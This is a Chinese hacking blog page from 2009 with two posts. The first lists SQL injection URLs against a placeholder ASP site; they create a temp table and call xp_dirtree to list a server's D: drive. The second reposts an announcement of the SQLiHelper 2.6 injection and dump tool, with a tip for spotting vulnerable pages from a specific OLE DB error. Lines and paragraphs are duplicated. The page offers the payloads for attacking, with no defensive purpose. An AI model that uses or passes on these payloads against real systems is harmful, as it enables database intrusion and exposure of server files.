Mssql Public权限列目录
作者:admin 日期:2009-11-16
注入点执行
aaa.com/xxx.asp?id=123;create table %23%23dhtemq (list int not null identity (1,1), dirtree nvarchar(500),num1 nvarchar(500),num2 nvarchar(500))
注入点执行
aaa.com/xxx.asp?id=123;insert into %23%23dhtemq(dirtree,num1,num2) exec master.dbo.xp_dirtree [d:\] ,1,1;--
注入点执行
aaa.com/xxx.asp?id=123;create table %23%23dhtemq (list int not null identity (1,1), dirtree nvarchar(500),num1 nvarchar(500),num2 nvarchar(500))
注入点执行
aaa.com/xxx.asp?id=123;insert into %23%23dhtemq(dirtree,num1,num2) exec master.dbo.xp_dirtree [d:\] ,1,1;--
注入点执行
Tags: MSSQL
SQLiHelper 2.6 Injector and Dumper for MYSQL & ( a
作者:admin 日期:2009-04-01
# 鬼仔:备份地址
SQLIHelperV2.6.rar
y0,
sorry for the NO update, but got time last weekend and tried out the ODBC convert sql injection exploit for MSSQL and implemented it on sqli helper. easy to spot exploitable page, just add a qoute, if you get “Microsoft OLE DB Provider for SQL Server error ‘80040e07′” then its exploitable
SQLI Helper for MYSQL and MSSQL 2.6 ODBC Error Message Exploit
SQLIHelperV2.6.rar
y0,
sorry for the NO update, but got time last weekend and tried out the ODBC convert sql injection exploit for MSSQL and implemented it on sqli helper. easy to spot exploitable page, just add a qoute, if you get “Microsoft OLE DB Provider for SQL Server error ‘80040e07′” then its exploitable
SQLI Helper for MYSQL and MSSQL 2.6 ODBC Error Message Exploit
Tags: Dumer Injector MSSQL MySQL SQLiHelper
